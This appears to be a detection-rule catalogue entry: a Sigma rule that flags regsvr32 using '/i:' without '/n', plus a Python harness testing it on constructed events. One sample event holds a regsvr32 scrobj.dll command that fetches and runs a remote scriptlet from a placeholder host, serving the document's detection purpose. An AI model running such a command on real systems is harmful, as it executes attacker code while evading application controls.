Techniques
Sample rules
Potential Regsvr32 Commandline Flag Anomaly
- source: sigma
- techniques:
  - t1218
  - t1218.010
Description
Detects a potential command line flag anomaly involving "regsvr32": the "/i" flag (which passes an install string to the DLL's DllInstall export) is used without the "/n" flag (which suppresses the DllRegisterServer call). Legitimate installers almost always pair the two, so "/i" on its own is uncommon and worth reviewing; the "windash" modifier means the rule also matches the "-i:" and "-n" spellings of the flags.
Detection logic
selection:
    Image|endswith: \regsvr32.exe
    CommandLine|contains|windash: ' -i:'
filter_main_flag:
    CommandLine|contains|windash: ' -n '
condition: selection and not 1 of filter_main_*
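The detection logic above, run over a handful of constructed process-creation events, as an added example that is not part of the original rule or of the Sigma project. It implements the two Sigma modifiers the rule relies on: `endswith` on the image path and `contains|windash`, which expands every "-" in the needle so that both "-i:" and "/i:" match (newer Sigma specifications also add Unicode dash variants; those are omitted here, an assumption). Sigma string matching is case-insensitive, so both sides are lower-cased. The events, paths and URLs are constructed for the example and are not real telemetry.

```python
import itertools

# Constructed process-creation events (not real telemetry, not from the rule).
SAMPLE_EVENTS = [
    # 0: /i: without /n -> fires (classic scriptlet-style invocation)
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /i:http://example.invalid/file.sct scrobj.dll"},
    # 1: /i: paired with /n -> filtered (expected installer usage)
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /i:C:\Temp\setup.dll"},
    # 2: same as 1 but with dash-style flags -> filtered thanks to windash
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe -s -n -i:C:\Temp\setup.dll"},
    # 3: plain registration, no /i: at all -> no selection match
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Temp\legit.dll"},
    # 4: /i: present but the image is not regsvr32 -> no selection match
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe /i:C:\Temp\foo.dll"},
    # 5: /n is last on the line, so the filter's ' -n ' (with trailing space)
    #    never matches and the rule still fires: a caveat of the filter as written
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /i:C:\Temp\setup.dll /n"},
]


def windash_variants(needle: str):
    """Expand a Sigma `windash` needle: every '-' may also appear as '/'."""
    positions = [i for i, ch in enumerate(needle) if ch == "-"]
    for combo in itertools.product("-/", repeat=len(positions)):
        chars = list(needle)
        for pos, ch in zip(positions, combo):
            chars[pos] = ch
        yield "".join(chars)


def contains_windash(value: str, needle: str) -> bool:
    """Sigma `contains|windash`, case-insensitive like all Sigma string matching."""
    haystack = value.lower()
    return any(variant.lower() in haystack for variant in windash_variants(needle))


def matches_rule(event: dict) -> bool:
    """Evaluate: selection and not 1 of filter_main_* for one event."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    selection = image.endswith(r"\regsvr32.exe") and contains_windash(cmdline, " -i:")
    filter_main_flag = contains_windash(cmdline, " -n ")
    return selection and not filter_main_flag


def alerts(events=SAMPLE_EVENTS) -> list:
    """Return the events the rule would alert on, in input order."""
    return [e for e in events if matches_rule(e)]


if __name__ == "__main__":
    for e in alerts():
        print("ALERT:", e["CommandLine"])
```

Event 5 shows why the filter deserves a second look in your own environment: because the filter string carries a trailing space, a command line that ends in "/n" is not excluded and still alerts. That is a false positive for a normal installer, but tightening the filter (for example by also matching "/n" at end of line) trades it for a small evasion window, so decide deliberately rather than copying either behaviour.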